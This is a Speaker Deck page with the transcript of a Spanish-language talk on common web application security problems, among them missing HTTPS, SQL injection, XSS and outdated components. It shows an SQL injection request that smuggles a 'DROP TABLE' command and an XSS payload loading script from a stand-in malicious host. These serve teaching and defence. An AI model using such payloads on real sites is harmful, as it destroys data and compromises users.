Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
There Is No Silver Bullet (Español)
Search
Harley Watson
November 29, 2014
Programming
0
130
There Is No Silver Bullet (Español)
Harley Watson
November 29, 2014
Tweet
Share
More Decks by Harley Watson
See All by Harley Watson
paper tickets > smartcards, probably.
unlobito
0
7.2k
one, two step
unlobito
0
650
What's in your pocket? (BSides Manchester)
unlobito
0
830
sorry, we're cash only. (securi-tay)
unlobito
1
960
Sorry, we're cash only. (hacksoc)
unlobito
0
98
There Is No Silver Bullet
unlobito
0
780
Other Decks in Programming
See All in Programming
上手に付き合うコンポーネントテスト
quramy
2
590
Desafios e Lições Aprendidas na Migração de Monólitos para Microsserviços em Java
jessilyneh
2
150
LangGraphでのHuman-in-the-Loopの実装
os1ma
3
1.1k
マルチモジュールにおけるテスト最適化
fxwx23
0
210
Boost Performance and Developer Productivity with Jakarta EE 11
ivargrimstad
0
570
Architecture Decision Record (ADR)
nearme_tech
PRO
1
700
Modern Angular with the NGRX Signal Store New Rules for Your Architecture @BASTA! 2024 in Mainz
manfredsteyer
PRO
0
170
はじめてみよう量子プログラミング
itokoichi01
0
230
Pythonで改めて考える「クラス(class)」の使いどころ
os1ma
8
2.3k
From Idea to IDE: Developing Plugins for Android Studio
thisaay
1
230
Scala アプリケーションのビルドを改善してデプロイ時間を 1/4 にした話 | How I improved the build of my Scala application and reduced deployment time by 4x
nomadblacky
1
180
Google Sign-inの移行から始めるCredential Manager活用
clockvoid
0
440
Featured
See All Featured
5 minutes of I Can Smell Your CMS
philhawksworth
202
19k
4 Signs Your Business is Dying
shpigford
179
21k
The Invisible Side of Design
smashingmag
296
50k
A designer walks into a library…
pauljervisheath
201
24k
GraphQLの誤解/rethinking-graphql
sonatard
65
9.8k
BBQ
matthewcrist
83
9.2k
Easily Structure & Communicate Ideas using Wireframe
afnizarnur
190
16k
The Pragmatic Product Professional
lauravandoore
31
6.2k
実際に使うSQLの書き方 徹底解説 / pgcon21j-tutorial
soudai
166
48k
Product Roadmaps are Hard
iamctodd
PRO
48
10k
No one is an island. Learnings from fostering a developers community.
thoeni
18
2.9k
Put a Button on it: Removing Barriers to Going Fast.
kastner
58
3.4k
Transcript
there is no silver bullet Henri Watson
¿Cuáles son los problemas que comúnmente afectan a las
aplicaciones web en la República Dominicana?
Una falta de HTTPS
Usar HTTPS no te va a quitar el pica
pollo del día.
La propuesta actual para HTTP/2.0 obliga el uso de
TLS.
Si decides usar HTTPS, también usa Strict-‐Transport-‐Security y
ssllabs.com/ssltest
Inyecciones SQL
GET /rastreador?orden=12345”; DROP TABLE ordenes;-‐-‐ SELECT * FROM
ordenes WHERE orden = “12345”; DROP TABLE ordenes;-‐-‐” AND estado = “pendiente” Solicitud del cliente al servidor. Solicitud del servidor web a la base de datos.
None
None
None
Problemas en el manejo de autenacación
None
None
Cross-‐Site Scripang (XSS)
GET /hola?nombre=<script src=“hhp://malva.do/ jajaxddd.js”></script> ¡Hola, <script src=“hhp://malva.do/jajaxddd.js”></ script>!
Solicitud del cliente al servidor. Respuesta del servidor al cliente.
Content-‐Security-‐Policy
Exposición de datos sensiavos
None
Ualizando Componentes con Vulnerabilidades Conocidas
Mailing Lists • bugtraq hhp://www.securityfocus.com/archive/1 • debian-‐security-‐announce
hhps://lists.debian.org/debian-‐security-‐announce/ • fulldisclosure hhp://nmap.org/mailman/lisanfo/fulldisclosure
Mailing Lists •
[email protected]
hhps://hhpd.apache.org/lists.html#hhp-‐announce • nginx-‐announce
hhp://mailman.nginx.org/mailman/lisanfo/nginx-‐ announce • php-‐announce hhp://php.net/mailing-‐lists.php
None
Servicio a Cliente
None
¿Por qué una no existe una « bala de
plata »?
La seguridad informáaca es una inversión constante.
Heartbleed
Al poner los datos de tus usuarios en riesgo,
también pones tu reputación en riesgo.
¡Gracias! @henriwatson
[email protected]
hhps://henriwatson.com/talks/silverbullet